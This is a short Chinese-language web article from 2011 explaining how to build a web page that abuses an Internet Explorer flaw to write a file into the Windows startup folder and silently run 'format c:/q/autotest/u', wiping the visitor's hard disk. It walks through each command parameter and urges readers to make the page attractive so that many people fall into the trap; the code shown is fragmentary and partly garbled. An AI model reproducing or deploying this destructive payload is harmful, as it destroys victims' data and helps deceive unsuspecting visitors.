有关HTML代码的另类应用

发布时间：2011-06-26 05:04:31作者：知识屋

这个是一个关于HTML代码攻击的，虽然短点大家看看怎么样，能实现的哦。

现在的Windows操作系统实在是很方便，连格式化都是只用鼠标点点就可以了，不用象以前那样要输入命令来完成格盘。

我们要做一个格本地磁盘网页并不是很难，会HTML代码的朋友一定是没有什么问题的，这个其实就是利用一下IE的漏洞来实现我们的目的。

下面我们看一下下面的代码我们就会发现其中的奥妙所在了。

scr.reset()

scr.path="c:windowsstart menuprograms启动文件名

scr.doc=""

wsh.run('start.exe /m format c:/q/autotest/u')

对于HTML代码了解的朋友们一定看出来了吧，这段代码的利害之处就在于最后一句，格你的磁盘没商量。

下面我们来看看这段代码的，具体的分析一下的他的工作原理是怎么样的。

首先，我们来看看这一句

scr.path="c:windowsstart menuprograms启动文件名

这句，就是当看到这个网页的时候，它会写入到用户的机器的启动目录下，并以一个文件名的文件形式出现

wsh.run('start.exe /m format c:/q/autotest/u')

这句就是我们这里所要讲的核心东西了，对于format 这个命令大家不会陌生的吧，只要知道这个命令的朋友，一定会知道这句命令的意思的，我就在这里不在多说什么了。

在这里我把他的一些参数，简要的说说，大家会更加明白的。

在进行格盘的时候系统会与你进行对话，是否进行的，大家看到这个参数了吗 /autotest他会强制性的对你的硬盘进行格式化，而不再进行询问；/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与 /m选项配合，哈哈，相信在执行时以最小化的状态进行，谁都会头痛的。

在这段代码里，核心语句

wsh.run('start.exe /m format c:/q/autotest/u')

我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些，相信一定会有很多的人会上当，不小心中了你的圈套。

（免责声明：文章内容如涉及作品内容、版权和其它问题，请及时与我们联系，我们将在第一时间删除内容，文章内容仅供参考）

投注系统软件生活运动冒险手机美化放置换装赛车社交导航系统闯关铃声舞蹈购物仙侠体育回合宫斗策略剧情摄影英语口语奇迹儿童休闲手机赚钱战国趣味二次元影音 WIFI 办公招聘射击 RPG 关卡漫画经营健康辅助抖音三国吃鸡棋牌抢红包模拟竞技理财